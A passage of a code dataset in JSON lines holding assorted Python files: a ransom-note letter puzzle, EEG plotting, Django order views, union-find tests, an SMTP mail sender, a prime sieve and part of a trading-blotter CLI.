+{"seq_id":"211872693","text":"def canConstruct( ransomNote, magazine):\n \"\"\"\n :type ransomNote: str\n :type magazine: str\n :rtype: bool\n \"\"\"\n values = list(magazine)\n print(values)\n for letter in ransomNote:\n if letter in values:\n values.remove(letter)\n print(values)\n else: \n return False\n return True\nprint(canConstruct('aaa', 'abaa'))","sub_path":"ransomNote.py","file_name":"ransomNote.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"570346637","text":"''' Code to plot graph to compare each stimuli for alcoholic and control subjects'''\r\n\r\nimport pandas as pd\r\nimport pickle as pick\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\npath=r'C:\\Users\\USER\\small set'\r\ncol_names=['sensor position','sample number','sensor value(mV)']\r\n\r\npq=None\r\nfor dir in os.listdir(path):\r\n path1=path+'\\\\'+dir \r\n df_list=[]\r\n print(dir)\r\n for files in os.listdir(path1):\r\n path1=path1+'/'\r\n pq=pd.read_pickle(r'C:\\Users\\USER\\small set'+'\\\\'+dir+'\\\\'+files)\r\n df_list.append(pq)\r\n ty=pd.concat(df_list,axis=0)\r\n ui=pq['sensor position'].drop_duplicates()\r\n extra=pd.DataFrame({'sensor position':ui.tolist(),'sensor number':range(1,65)})\r\n ty=pd.merge(ty,extra,on='sensor position')\r\n grp=ty.groupby(['sensor position','sample number','sensor number'])\r\n gh=grp.mean()\r\n pq=gh.reset_index() \r\n if(dir.startswith('a_1')):\r\n a1=pq\r\n if(dir.startswith('c_1')):\r\n c1=pq\r\n if(dir.startswith('a_m')):\r\n am=pq\r\n if(dir.startswith('c_m')):\r\n cm=pq\r\n if(dir.startswith('a_n')):\r\n an=pq\r\n if(dir.startswith('c_n')):\r\n cn=pq\r\n \r\nfor i in range(1,65):\r\n a_1=a1[a1['sensor number'].apply(lambda x:x==i)]\r\n c_1=c1[c1['sensor number'].apply(lambda x:x==i)]\r\n a_m=am[am['sensor number'].apply(lambda x:x==i)]\r\n c_m=cm[cm['sensor number'].apply(lambda x:x==i)]\r\n a_n=an[an['sensor number'].apply(lambda x:x==i)]\r\n c_n=cn[cn['sensor number'].apply(lambda x:x==i)]\r\n fig=plt.figure(figsize=(14.0,8.0))\r\n plt.subplot(1,3,1)\r\n plt.title('Stimulus 1')\r\n plt.plot(a_1.loc[:,'sample number']/255,a_1.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_1.loc[:,'sample number']/255,c_1.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.subplot(1,3,2)\r\n plt.title('Matching stimuli')\r\n plt.plot(a_m.loc[:,'sample number']/255,a_m.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_m.loc[:,'sample number']/255,c_m.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.subplot(1,3,3)\r\n plt.title('Non-Matching stimuli')\r\n plt.plot(a_n.loc[:,'sample number']/255,a_n.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_n.loc[:,'sample number']/255,c_n.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.legend()\r\n fig.savefig('E:\\CSIR CDRi assignment\\Graph\\Plot for various stimuli\\Comparing alcoholic and control subjects\\Electrode'+str(ui.tolist()[i-1])+'.png')\r\n plt.close(fig)\r\n \r\n","sub_path":"Comparing alcoholic and control subjects for various stimuli/Code to plot graph comparing alcoholics vs control.py","file_name":"Code to plot graph comparing alcoholics vs control.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"1830451","text":"# Given two strings, print all the interleavings of the strings.\n# e.g. AB,XY ⇒ ABXY, AXBY, AXYB, XABY, XAYB, XYAB\n\ndef gen_interleaved(s1, s2):\n len1 = len(s1)\n len2 = len(s2)\n \n def _gen_str(i, j):\n if i == len1 and j == len2:\n return [[]]\n \n picked1_results = []\n picked2_results = []\n \n if i < len1:\n picked1 = s1[i]\n picked1_results = _gen_str(i+1, j)\n for item in picked1_results:\n item.append(picked1)\n \n if j < len2:\n picked2 = s2[j]\n picked2_results = _gen_str(i, j+1)\n for item in picked2_results:\n item.append(picked2)\n \n return picked1_results + picked2_results\n \n results = _gen_str(0,0)\n return [\"\".join(reversed(item)) for item in results]\n \n\n\nif __name__ == '__main__':\n s1 = 'AB'\n s2 = 'XY'\n \n s3 = 'xyz'\n s4 = 'abcd'\n print(gen_interleaved(s1,s2))\n print(gen_interleaved(s3,s4))\n","sub_path":"3 Strings/3-06_gen_interleave.py","file_name":"3-06_gen_interleave.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"561647051","text":"#coding=utf-8\n\n# Autor: Daniel Abbassi\n# Beginn: 2012-11\n\nimport xlrd\nimport codecs\n\ndef writeFile(filename, data):\n correctlyWritten = False\n try:\n maybeTheSame = codecs.open(filename, \"r\", \"utf-8\").read()\n if data in maybeTheSame and len(maybeTheSame)==len(data):\n correctlyWritten = True\n except:\n pass \n if not correctlyWritten:\n fileWrite = codecs.open(filename, \"w\", \"utf-8\")\n print >> fileWrite, data\n fileWrite.close()\n\nbook = xlrd.open_workbook(\"ratings.xls\", encoding_override=\"cp1252\").sheet_by_index(0)\n\nresult = \"
\"\n\nfor rownum in range(book.nrows):\n for el in book.row_values(rownum):\n if len(el.split(\",\")) > 4:\n result += \" \"\n name = el.split(\",\")[5].replace('\"', '').strip()\n result += name\n link = el.split(\",\")[len(el.split(\",\"))-1].replace('\"', '').strip()\n result += \" \"\n result += \"\" + link + \"\" + \"
\\r\\n\"\n \nresult += \"
\"\nwriteFile(\"rateThis.html\", result)","sub_path":"CreateMovieList/src/NewIMDbRatings.py","file_name":"NewIMDbRatings.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"452527104","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom accounts.models import *\nfrom .forms import OrderForm,CreateUesrForm\nfrom django.forms import inlineformset_factory\nfrom .filters import OrderFilter\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import unauthenticated_user,allowed_users,admin_only\nfrom django.contrib.auth.models import Group\nfrom .forms import CustomerForm\n\n\n# Create your views here.\n@unauthenticated_user\ndef Register(request):\n \n form = CreateUesrForm()\n if request.method == 'POST':\n form = CreateUesrForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n ## Note :-- we can do this by using signals very easily\n # group = Group.objects.get(name='customer')\n # user.groups.add(group) # left <====== right\n # Customer.objects.create(\n # user=user.username,\n # ) \n\n messages.success(request,'Account was successfully created for ' + username)\n return redirect('login')\n\n context = {\"form\":form} \n return render(request, \"accounts/register.html\",context) \n\n\n@unauthenticated_user\ndef loginPage(request):\n\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request,user)\n return redirect('home')\n\n else:\n messages.info(request,'Username OR Password is incorrect') \n\n\n context = {} \n return render(request, \"accounts/login.html\", context) \n\n\ndef logoutPage(request):\n logout(request)\n return redirect('login')\n\n\n\n@login_required(login_url='login')\n@admin_only\ndef home(request):\n orders = Order.objects.all()\n customers = Customer.objects.all()\n\n total_orders = orders.count()\n total_customers = customers.count()\n\n delivered = orders.filter(status=\"Delivered\").count()\n pending = orders.filter(status=\"Pending\").count()\n\n context = {'customers': customers, 'orders': orders,\n \"total_orders\":total_orders, \"total_customers\":total_customers, \"delivered\":delivered,\n \"pending\":pending,\n }\n return render(request, 'accounts/dashboard.html',context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['customer'])\ndef userPage(request):\n orders = request.user.customer.order_set.all()\n\n total_orders = orders.count()\n delivered = orders.filter(status='Delivered').count()\n pending = orders.filter(status='Pending').count()\n context = {'orders':orders, 'total_orders':total_orders, 'delivered':delivered, 'pending':pending,}\n return render(request, 'accounts/user.html', context) \n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['customer'])\ndef accountSettings(request):\n customer = request.user.customer\n form = CustomerForm(instance=customer)\n\n if request.method == 'POST':\n form = CustomerForm(request.POST, request.FILES, instance=customer)\n if form.is_valid():\n form.save()\n context = {'form':form}\n\n return render(request, 'accounts/account_settings.html', context) \n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef products(request):\n products = Product.objects.all()\n context = {'products': products}\n\n return render(request, 'accounts/products.html',context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef customer(request, pk_test):\n customer = Customer.objects.get(id=pk_test)\n print(\"=======1=====\", customer.id)\n \n orders = customer.order_set.all() # \n order_count = len(orders)\n print(\"=======1=====\", orders) \n\n myFilter = OrderFilter(request.GET, queryset=orders)\n orders = myFilter.qs\n \n \n context = {'customer': customer, 'orders': orders,'order_count': order_count,'myFilter':myFilter}\n return render(request, 'accounts/customer.html',context) \n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef createOrder(request,pk):\n OrderFormSet = inlineformset_factory(Customer,Order,fields=('product','status'),extra=10)\n customer = Customer.objects.get(id=pk)\n # order = Order.objects.get(id=pk)\n # form = OrderForm(initial={'customer':customer,'status': order.status})\n # form = OrderForm(initial={'customer':customer})\n formset = OrderFormSet(queryset=Order.objects.none() ,instance=customer) \n if request.method == 'POST':\n # form = OrderForm(request.POST) \n formset = OrderFormSet(request.POST,instance=customer)\n if formset.is_valid():\n formset.save()\n return redirect('/')\n\n\n context = {\"formset\":formset}\n return render(request,\"accounts/order_form.html\",context)\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef updateOrder(request,pk):\n order = Order.objects.get(id=pk)\n form = OrderForm(instance=order)\n\n if request.method == 'POST':\n form = OrderForm(request.POST,instance=order)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {'form':form}\n return render(request,\"accounts/order_form.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef deleteOrder(request,pk):\n order = Order.objects.get(id=pk)\n if request.method == 'POST':\n order.delete()\n return redirect('/')\n\n context = {'item':order}\n return render(request,\"accounts/delete.html\", context)\n\n\n \n\n \n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"41758884","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Tests for algspy.uf\n\"\"\"\n\nimport os\nimport time\nimport pytest\n\nfrom algspy.uf import UF\n\nbase_dir = os.path.dirname(__file__)\n\nclass TestUnionFind:\n\n def test_size(self):\n \"\"\" Makes sure size method gives the right number of elements \"\"\"\n N = 5\n uf = UF(N)\n assert uf.size() == N\n\n def test_invalid_arguments(self):\n \"\"\" Gives non-integers to class constructor to test raise \"\"\"\n invalid_args = (None, -2, 'eleven', {}, [], (), 1.0)\n for arg in invalid_args:\n with pytest.raises(ValueError):\n UF(arg)\n\n def test_invalid_node_ranges(self):\n \"\"\" Makes sure operations only work on range [0, N) \"\"\"\n N = 10\n uf = UF(N)\n\n with pytest.raises(IndexError):\n uf.connected(-1, 10)\n uf.union(1, 11)\n uf.union(-2, 15)\n\n\n def test_uf_funtionality(self):\n \"\"\" Tests union-find basic functionality with 10 elements \"\"\"\n test_filepath = os.path.join(base_dir, 'data/tinyUF.txt')\n with open(test_filepath) as f:\n N = int(f.readline())\n uf = UF(N)\n for line in f:\n p, q = [int(n) for n in line.split()]\n if not uf.connected(p, q):\n uf.union(p, q)\n \n assert uf.count() == 2\n assert uf.connected(8, 4) is True\n assert uf.connected(7, 4) is False\n assert uf.connected(3, 9) is True\n assert uf.connected(5, 3) is False\n assert uf.connected(0, 2) is True\n assert uf.connected(9, 0) is False\n\n def test_uf_performance(self):\n \"\"\" Tests runtime doing 2 million operations \"\"\"\n start_time = time.time()\n test_filepath = os.path.join(base_dir, 'data/largeUF.txt')\n with open(test_filepath) as f:\n N = int(f.readline())\n largeUF = UF(N)\n for line in f:\n p, q = [int(n) for n in line.split()]\n if not largeUF.connected(p, q):\n largeUF.union(p, q)\n end_time = time.time()\n\n assert (end_time - start_time) < 15.0\n","sub_path":"tests/test_union_find.py","file_name":"test_union_find.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"37435384","text":"'''\nCreated on Sep 21, 2018\n\n@author: ashwath\n\n\n'''\nfrom gateway import ConfigConst\nfrom gateway import ConfigUtil\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nclass SmtpClientConnector(object):\n '''\n classdocs\n '''\n\n\n def __init__(self):\n '''\n load the configuration properties file on creation\n '''\n self.config = ConfigUtil.ConfigUtil('../../../data/ConnectedDevicesConfig.props')\n self.config.loadConfig()\n print('Configuration data...\\n' + str(self.config))\n \n '''\n #This method will read all the configuration details from the file ConnectedDevicesConfig.props\n #Read the mail host, to mailID, from mailID, authentication tokens from the configuration file (private file)\n '''\n def publishMessage(self, topic, data):\n host= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.HOST_KEY)\n port= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.PORT_KEY)\n fromAddr= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.FROM_ADDRESS_KEY)\n toAddr= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION, ConfigConst.TO_ADDRESS_KEY)\n authToken= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION, ConfigConst.USER_AUTH_TOKEN_KEY)\n msg= MIMEMultipart()\n msg['From'] = fromAddr\n msg['To']= toAddr\n \n msg['Subject'] = topic\n \n #Body is send as a parameter\n msgBody = str(data)\n msg.attach(MIMEText(msgBody))\n msgText= msg.as_string()\n # send e-mail notification\n smtpServer= smtplib.SMTP_SSL(host, port)\n smtpServer.ehlo()\n smtpServer.login(fromAddr, authToken)\n smtpServer.sendmail(fromAddr, toAddr, msgText)\n smtpServer.close()\n ","sub_path":"VehicleCrashDetection/gateway/SmtpClientConnector.py","file_name":"SmtpClientConnector.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"583221078","text":"# Pointcloud_Server.py\n# \n#\n# Created by Ayat Mohammed on 8/12/15.\n#\nfrom paraview.simple import *\nimport paraview.servermanager as sm\n\n\n# Creates a new built-in session and makes it the active session.\n#def Connect(ds_host=None, ds_port=11111, rs_host=None, rs_port=11111)\n#Connect()\nConnect('localhost',10001)\n\n#sphere=Sphere()\n#for x in range(0, 50):\nreader = sm.sources.XMLUnstructuredGridReader(FileName = \"/work/blueridge/maaayat/seb3rd_new/seb3rd_new_ab.vtu\")\nd3 = sm.filters.D3(Input = reader)\n #d3output = sm.Fetch(d3)\nwriter = sm.writers.XMLPUnstructuredGridWriter(Input = d3, FileName = \"/work/blueridge/maaayat/seb3rd_new/seb3rd_new_ab.pvtu\")\nwriter.UpdatePipeline()\n\nrenModule = sm.CreateRenderView()\ncone = Cone()\ndisplay = sm.CreateRepresentation(cone, renModule)\n\n# Creates a new render view on the active session.\nview = sm.CreateRenderView()\nrepr = sm.CreateRepresentation(d3, view)\n\"\"\"\nreader.UpdatePipeline()\ndataInfo = reader.GetDataInformation()\npointDataInfo = dataInfo.GetPointDataInformation()\narrayInfo = pointDataInfo.GetArrayInformation(\"displacement9\")\n\"\"\"\n\n\n# Create a new sphere proxy on the active session and register it\n# in the sources group.\n#sphere = sm.sources.SphereSource(registrationGroup=\"sources\", ThetaResolution=16, PhiResolution=32)\n\n# Create a representation for the sphere proxy and adds it to the render\n# module.\n#display = sm.CreateRepresentation(sphere, renModule)\n#cone = Cone()\n#display = sm.CreateRepresentation(cone, renModule)\n#help(cone)\nrenModule.StillRender()\nview.StillRender()\n#sm.Disconnect()\n","sub_path":"Pointcloud_Server.py","file_name":"Pointcloud_Server.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"146597345","text":"# i7-4870HQ 4 cores, 8 threads, 2.5 GHz -> 3.7 GHz\n# real\t0m1.680s\n# user\t0m1.617s\n# sys\t0m0.053s\n\n# Performance here is definitely not optimal, but I can't think\n# of a way to implement a sieve with multiprocessing\n\nfrom math import sqrt\n\ndef generate_sieve(n):\n\tsieve = [ i for i in range(n)]\n\n\tremove_int = 2\n\ti = 2\n\n\twhile remove_int < sqrt(len(sieve)):\n\t\twhile (remove_int * i) < len(sieve):\n\t\t\tsieve[remove_int*i] = 0\n\t\t\ti += 1\n\t\ti = 2\n\t\tremove_int += 1\n\t\twhile(sieve[remove_int] == 0):\n\t\t\tremove_int += 1\n\t\t\tif remove_int >= len(sieve):\n\t\t\t\tbreak\n\n\treturn sieve[2:]\n\nif __name__ == '__main__':\n\n\tprint(sum(generate_sieve(2000000)))","sub_path":"euler10.py","file_name":"euler10.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"356905880","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 16 14:59:59 2015\n\n@author: 96isasva\n\"\"\"\n\nclass Crop:\n def __init__(self,growth_rate, light_need, water_need):\n \n self._growth = 0\n self._days_groowing = 0\n self._growth_rate = growth_rate\n self._light_need = light_need\n self._water_need = water_need\n self._status = \"Seed\"\n self._type = \"Generic\"\n \ndef main():\n new_crop = Crop(1,4,3)\n print(new_crop._status)\n print(new_crop._light_need)\n print(new_crop._water_need)\n new_crop2 = Crop(1,5,9)\n print(new_crop2._status)\n print(new_crop2._light_need)\n print(new_crop2._water_need)\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"320023831","text":"\n\n\n\n\n\n\n\n\n\n\ndef large(a, seq) : \n x=0\n length = 0\n for k in a : \n length = length + 1\n for i in range(length) : \n p = 0\n x = 0\n for j in range(length) :\n for w in range(1, length) : \n if a[i] < a[j]: \n x = x + 5 \n if a[i] == a[j] and a[i] < a[w]: \n x = x + 5 \n else :\n x = x \n if x == 0 :\n errors = len(seq)-a[i] \n largest = i\n li = a[0:largest] + a[largest+1: len(a)]\n \n return errors, i \n\n\n\n\n\ndef match(protien, seq):\n count = 0\n li = []\n x = 0\n y = len(seq)\n while y < len(protien): \n h = 0\n count = 0\n for i in protien[x:y]: \n if i == seq[h]: \n count = count + 1 \n h = h+1 \n li = li + [count]\n x = x + 1 \n y = y + 1\n er, pos = large(li, seq) \n return er, pos \n\n\n\n\n\ndef textinfo():\n try: \n text = input(\"Please select a .txt file you would like to be evaluated: \" )\n text = open(text, \"r\")\n protien = text.readline()\n protien = protien.strip()\n numlines = 0\n for line in text :\n numlines = numlines +1\n text.seek(0)\n text.readline()\n seq = \"shit\"\n for i in range(1, numlines+1): \n seq = text.readline()\n seq = seq.strip() \n er, pos = match(protien, seq)\n print(\"sequence\", i, \"has\", er, \"errors at position\", pos)\n except FileNotFoundError :\n print()\n print(\"You may have incorrectly entered the document's name.\")\n print()\n\n\n\n\n\n\n\ndef main():\n try:\n textinfo()\n except NameError :\n print()\n print(\"Sorry, we can't seem to find that file, try another\")\n print()\nmain()\n\n\n\n\n","sub_path":"testFiles/match/match27.py","file_name":"match27.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"55602869","text":"# Copyright 2018 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nfrom quantrocket.cli.utils.parse import dict_str\n\ndef add_subparser(subparsers):\n _parser = subparsers.add_parser(\"blotter\", description=\"QuantRocket blotter CLI\", help=\"Place orders and track executions\")\n _subparsers = _parser.add_subparsers(title=\"subcommands\", dest=\"subcommand\")\n _subparsers.required = True\n\n examples = \"\"\"\nPlace one or more orders.\n\nReturns a list of order IDs, which can be used to cancel the orders or check\ntheir status.\n\nExamples:\n\nPlace orders from a CSV file.\n\n quantrocket blotter order -f orders.csv\n\nPlace orders from a JSON file.\n\n quantrocket blotter order -f orders.json\n\nPlace an order by specifying the order parameters on the command line:\n\n quantrocket blotter order --params ConId:123456 Action:BUY Exchange:SMART TotalQuantity:100 OrderType:MKT Tif:Day Account:DU12345 OrderRef:my-strategy\n \"\"\"\n parser = _subparsers.add_parser(\n \"order\",\n help=\"place one or more orders\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n source_group = parser.add_mutually_exclusive_group()\n source_group.add_argument(\n \"-f\", \"--infile\",\n metavar=\"INFILE\",\n dest=\"infilepath_or_buffer\",\n help=\"place orders from this CSV or JSON file (specify '-' to read file \"\n \"from stdin)\")\n source_group.add_argument(\n \"-p\", \"--params\",\n nargs=\"*\",\n type=dict_str,\n metavar=\"PARAM:VALUE\",\n help=\"order details as multiple key-value pairs (pass as 'param:value', for \"\n \"example OrderType:MKT)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_place_orders\")\n\n examples = \"\"\"\nCancel one or more orders by order ID, conid, or order ref.\n\nExamples:\n\nCancel orders by order ID:\n\n quantrocket blotter cancel -o 6002:45 6001:46\n\nCancel orders by conid:\n\n quantrocket blotter cancel -i 123456\n\nCancel orders by order ref:\n\n quantrocket blotter cancel --order-refs my-strategy\n\nCancel all open orders:\n\n quantrocket blotter cancel --all\n \"\"\"\n parser = _subparsers.add_parser(\n \"cancel\",\n help=\"cancel one or more orders by order ID, conid, or order ref\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n \"-o\", \"--order-ids\",\n metavar=\"ORDER_ID\",\n nargs=\"*\",\n help=\"cancel these order IDs\")\n parser.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"cancel orders for these conids\")\n parser.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"cancel orders for these order refs\")\n parser.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"cancel orders for these accounts\")\n parser.add_argument(\n \"--all\",\n action=\"store_true\",\n default=False,\n dest=\"cancel_all\",\n help=\"cancel all open orders\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_cancel_orders\")\n\n examples = \"\"\"\nList order status for one or more orders by order ID, conid, order ref, or account.\n\nExamples:\n\nList order status by order ID:\n\n quantrocket blotter status -o 6002:45 6001:46\n\nList order status for all open orders:\n\n quantrocket blotter status --open\n\nList order status of open orders by conid:\n\n quantrocket blotter status -i 123456 --open\n\nList order status of open orders by order ref:\n\n quantrocket blotter status --order-refs my-strategy --open\n \"\"\"\n parser = _subparsers.add_parser(\n \"status\",\n help=\"List order status for one or more orders by order ID, conid, \"\n \"order ref, or account\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n \"-o\", \"--order-ids\",\n metavar=\"ORDER_ID\",\n nargs=\"*\",\n help=\"limit to these order IDs\")\n parser.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to orders for these conids\")\n parser.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to orders for these order refs\")\n parser.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to orders for these accounts\")\n parser.add_argument(\n \"--open\",\n action=\"store_true\",\n dest=\"open_orders\",\n help=\"limit to open orders (default False, must be True if order_ids not provided)\")\n parser.add_argument(\n \"-f\", \"--fields\",\n metavar=\"FIELD\",\n nargs=\"*\",\n help=\"return these fields in addition to the default fields (pass '?' or any invalid \"\n \"fieldname to see available fields)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_list_order_statuses\")\n\n examples = \"\"\"\nQuery current positions.\n\nExamples:\n\nQuery current positions in human-readable format:\n\n quantrocket blotter positions --pretty\n\nSave current positions to CSV file:\n\n quantrocket blotter positions --outfile positions.csv\n\nQuery positions for a single order ref:\n\n quantrocket blotter positions --order-refs my-strategy\n \"\"\"\n parser = _subparsers.add_parser(\n \"positions\",\n help=\"query current positions\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n output_format_group = outputs.add_mutually_exclusive_group()\n output_format_group.add_argument(\n \"-j\", \"--json\",\n action=\"store_const\",\n const=\"json\",\n dest=\"output\",\n help=\"format output as JSON (default is CSV)\")\n output_format_group.add_argument(\n \"-p\", \"--pretty\",\n action=\"store_const\",\n const=\"txt\",\n dest=\"output\",\n help=\"format output in human-readable format (default is CSV)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_positions\")\n\n examples = \"\"\"\nQuery executions from the executions database.\n\nExamples:\n\nGet a CSV of all executions:\n\n quantrocket blotter executions -o executions.csv\n \"\"\"\n parser = _subparsers.add_parser(\n \"executions\",\n help=\"query executions from the executions database\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n filters.add_argument(\n \"-s\", \"--start-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to executions on or after this date\")\n filters.add_argument(\n \"-e\", \"--end-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to executions on or before this date\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_executions\")\n\n examples = \"\"\"\nQuery trading performance and return a PDF tearsheet or CSV of results.\n\nTrading performance is broken down by account and order ref and optionally by\nconid.\n\nExamples:\n\nGet a Moonchart PDF of all trading performance PNL:\n\n quantrocket blotter pnl -o pnl.pdf\n\nGet a PDF for a single account and order ref, broken down by conid:\n\n quantrocket blotter pnl --accounts U12345 --order-refs mystrategy1 --details -o pnl_details.pdf\n\nGet a CSV of performance results for a particular date range:\n\n quantrocket blotter pnl -s 2018-03-01 -e 2018-06-30 --csv -o pnl_2018Q2.csv\n\nCalculate daily performance as of 4PM Eastern time (instead of the default 11:59:59 UTC):\n\n quantrocket blotter pnl --time '16:00:00 America/New_York' -o pnl.pdf\n \"\"\"\n parser = _subparsers.add_parser(\n \"pnl\",\n help=\"query trading performance and return a PDF tearsheet or CSV of results\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n filters.add_argument(\n \"-s\", \"--start-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to history on or after this date\")\n filters.add_argument(\n \"-e\", \"--end-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to history on or before this date\")\n filters.add_argument(\n \"-t\", \"--time\",\n metavar=\"HH:MM:SS [TZ]\",\n help=\"time of day with optional timezone to calculate daily PNL (default is \"\n \"11:59:59 